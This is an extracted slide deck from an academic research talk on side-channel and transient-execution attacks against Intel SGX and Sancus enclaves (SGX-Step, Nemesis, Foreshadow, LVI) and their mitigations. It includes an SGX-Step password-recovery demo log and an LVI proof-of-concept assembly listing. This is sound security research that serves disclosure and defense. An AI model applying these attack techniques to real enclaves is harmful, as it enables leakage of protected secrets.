## 

### Microarchitectural Side-Channel Attacks for Privileged Software Adversaries

Jo Van Bulck

FWO/IBM Innovation Award Talk, Brussels, October 14, 2021

A imec-DistriNet, KU Leuven ☑ jo.vanbulck@cs.kuleuven.be ¥ jovanbulck







### SOCIAL DISTANCING STOP COVID-19







https://informationisbeautiful.net/visualizations/million-lines-of-code/



#### Enclaved execution: Reducing attack surface



Traditional layered designs: large trusted computing base

#### Enclaved execution: Reducing attack surface



Intel SGX promise: hardware-level isolation and attestation

#### Enclaved execution: Privileged side-channel attacks



**Game-changer:** Untrusted OS  $\rightarrow$  new class of powerful side channels!



1. Which novel privileged side channels exist?



2. How well can they be exploited in practice?

3. What can be leaked?

- 1. Which novel privileged side channels exist?
  - $\rightarrow$  We uncover previously unknown attack avenues



- 2. How well can they be exploited in practice?
  - $\rightarrow\,$  We develop new techniques and practical attack frameworks
- 3. What can be leaked?
  - $\rightarrow$  We leak metadata and data



## Idea 1: Privileged interrupts for side-channel amplification































Overall execution time reveals correctness of individual password bytes!

#### Building the side-channel oracle with execution timing?



#### Building the side-channel oracle with execution timing?

**Too noisy:** modern x86 processors are lightning fast...



#### Analogy: Studying galloping horse dynamics



https://en.wikipedia.org/wiki/Sallie\_Gardner\_at\_a\_Gallop



Copyright, 1878, by MUYBRIDGE.

MORSE'S Gallery, 417 Montgomery St., San Francisco.

THE HORSE IN MOTION.

Illustrated by MUYBRIDGE.

AUTOMATIC ELECTRO-PHOTOGRAPH.

"SALLE GARDNER," owned by LELAND STANFORD; running at a 1.40 gait over the Palo Alto track, 19th June, 1878.

#### SGX-Step: Executing enclaves one instruction at a time



https://github.com/jovanbulck/sgx-step

⊙ Unwatch - 27 ☆ Star 312 ♀ Fork 63

#### SGX-Step: Executing enclaves one instruction at a time



#### SGX-Step: Executing enclaves one instruction at a time



#### Demo: Building a deterministic password oracle with SGX-Step

```
[idt.c] DTR.base=0xfffffe000000000/size=4095 (256 entries)
[idt.c] established user space IDT mapping at 0x7f7ff8e9a000
[idt.c] installed asm IRO handler at 10:0x56312d19b000
[idt.c] IDT[ 45] @0x7f7ff8e9a2d0 = 0x56312d19b000 (seg sel 0x10): p=1: dpl=3: type=14: ist=0
[file.c] reading buffer from '/dev/cpu/1/msr' (size=8)
[apic.c] established local memory mapping for APIC BASE=0xfee00000 at 0x7f7ff8e99000
[apic.c] APIC ID=2000000: LVTT=400ec: TDCR=0
[apic.c] APIC timer one-shot mode with division 2 (lvtt=2d/tdcr=0)
[main.c] recovering password length
[attacker] steps=15: guess='******
[attacker] found pwd len = 6
[main.c] recovering password bytes
                          [attacker] steps=35; guess='SECRET' --> SUCCESS
[apic.c] Restored APIC LVTT=400ec/TDCR=0)
[file.c] writing buffer to '/dev/cpu/1/msr' (size=8)
```

[main.c] all done: counted 2260/2183 IROs (AEP/IDT)

io@breuer:~/sqx-step-demo\$

9



## Idea 2: Privileged interrupts for microarchitectural leakage

#### From architecture...



#### From architecture... to microarchitecture



#### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Start-to-end trace enclaved execution

#### Nemesis attack: Inferring key strokes from Sancus enclaves



#### Enclave x-ray: Keymap bit traversal (ground truth)

#### Nemesis attack: Inferring key strokes from Sancus enclaves





Instruction (interrupt number)

#### Intel SGX microbenchmarks: Measuring x86 cache misses





Idea 3: Privileged page tables for transient data leakage

#### Abusing out-of-order and speculative execution



#### Abusing out-of-order and speculative execution



#### Abusing out-of-order and speculative execution





#### Transient-execution attacks: Welcome to the world of fun!









### inside<sup>™</sup>

### inside<sup>™</sup>

inside<sup>™</sup>

#### Rumors: Meltdown immunity for SGX enclaves?

## Meltdown melted down everything, except for one thing

"[enclaves] remain protected and completely secure"

— International Business Times, February 2018

ANJUNA'S SECURE-RUNTIME CAN PROTECT CRITICAL APPLICATIONS AGAINST THE MELTDOWN ATTACK USING ENCLAVES

"[enclave memory accesses] redirected to an abort page, which has no value" — Anjuna Security, Inc., March 2018

#### Rumors: Meltdown immunity for SGX enclaves?



SPECTRE-LIKE FLAW UNDERMINES INTEL PROCESSORS' MOST SECURE ELEMENT

AN SECURITY DB 14-18 D1:00 PM

I'M SURE THIS WON'T BE THE LAST SUCH PROBLEM —

## Intel's SGX blown wide open by, you guessed it, a speculative execution attack

Speculative execution attacks truly are the gift that keeps on giving.

https://wired.com and https://arstechnica.com

#### Building Foreshadow: Evade SGX abort page semantics



SGX checks prohibit unauthorized access

#### **Building Foreshadow: Evade SGX abort page semantics**



SGX checks prohibit unauthorized access

#### Building Foreshadow: Evade SGX abort page semantics





#### Mitigating Foreshadow: Flush CPU microarchitecture



#### Mitigating Foreshadow: Flush CPU microarchitecture

| 10BH | 267 | (A32_FLUSH_CMD) | Flush Command (WO)<br>Gives software a way to invalidate<br>structures with finer granularity than other<br>architectural methods. | If any one of the<br>enumeration conditions for<br>defined bit field positions<br>holds. |
|------|-----|-----------------|------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------|
|      |     | 0               | L1D_FLUSH: Writeback and invalidate the L1 data cache.                                                                             | If CPUID.(EAX=07H,<br>ECX=0):EDX[28]=1                                                   |
|      |     | 63:1            | Reserved                                                                                                                           |                                                                                          |









inside<sup>™</sup>



### inside<sup>™</sup>

#### Idea: Inverting Foreshadow & co. with Load Value Injection (LVI)



#### Idea: Inverting Foreshadow & co. with Load Value Injection (LVI)





| 8 🔿 🖉 |                                              | asm.S (~/sgx-step-fresh/app/lvi/Enclave) - VI |
|-------|----------------------------------------------|-----------------------------------------------|
| E/a   | sm.S main.c                                  |                                               |
| 28    | .global ecall lvi sb rop                     |                                               |
| 29    | # %rdi store pt                              |                                               |
| 30    | # %rsi oracle_pt                             |                                               |
| 31    | ecall_lvi_sb_rop:                            |                                               |
| 32    | <pre>mov %rsp, rsp_backup(%rip)</pre>        |                                               |
| 33    | lea page_b(%rip), %rsp                       |                                               |
| 34    | add \$OFFSET, %rsp                           |                                               |
| 35    |                                              |                                               |
| 36    | /* transient delay */                        |                                               |
| 37    | clflush dummy(%rip)                          |                                               |
| 38    | mov dummy(%rip), %rax                        |                                               |
| 39    |                                              |                                               |
| 40    | /* STORE TO USER ADRS */                     |                                               |
| 41    | movq \$'R', (%rdi)                           |                                               |
| 42    | lea ret_gadget(%rip), %rax                   |                                               |
| 43    | movq %rax, 8(%rdi)                           |                                               |
| 44    |                                              |                                               |
| 45    | <pre>/* HIJACK TRUSTED LOAD FROM ENCLA</pre> | NVE STACK */                                  |
| 46    | <pre>/* should go to do_real_ret; will</pre> | . transiently go to ret_gadget if we fault    |
| 47    | pop %rax                                     |                                               |
| 48    | #if LFENCE                                   |                                               |
| 49    | notq (%rsp)                                  |                                               |
| 50    | notq (%rsp)                                  |                                               |
| 51    | lfence                                       |                                               |
| 52    | ret                                          |                                               |
| 53    | #else                                        |                                               |
| 54    | ret                                          |                                               |
| 55    | #endif                                       |                                               |
| 56    |                                              |                                               |
| 57    | 1: jmp 1b                                    |                                               |

# 57 1: jmp ro 58 m fence 59 60 do\_real\_ret: 61 mov rsp\_backup(%rip), %rsp 62 ret 63 Enclave/asm.S

#### Mitigating LVI: Fencing vulnerable load instructions



#### Mitigating LVI: Fencing vulnerable load instructions



#### Mitigating LVI: Compiler and assembler support



-mlfence-after-load



-mlvi-hardening



-Qspectre-load

#### <mark>GNU Assembler</mark> Adds New Options For Mitigating Load Value Injection Attack

Written by Michael Larabel in GNU on 11 March 2020 at 02:55 PM EDT. 14 Comments

#### LLVM Lands <mark>Performance-Hitting Mitigation</mark> For Intel LVI Vulnerability

Written by Michael Larabel in Software on 3 April 2020. Page 1 of 3. 20 Comments

#### More Spectre Mitigations in MSVC

March 13th, 2020

#### Intel architectural enclaves: lfence counts

libsgx\_qe.signed.so



#### 23 fences

October 2019—"surgical precision"

#### Intel architectural enclaves: lfence counts

libsgx\_qe.signed.so



#### 23 fences

October 2019—"surgical precision"

March 2020—"big hammer"

- ⇒ **Trusted execution** environments (Intel SGX) ≠ perfect(!)
- ⇒ Importance of fundamental **side-channel research**; no silver-bullet defenses
- $\Rightarrow$  Security **cross-cuts** the system stack: hardware, OS, compiler, application



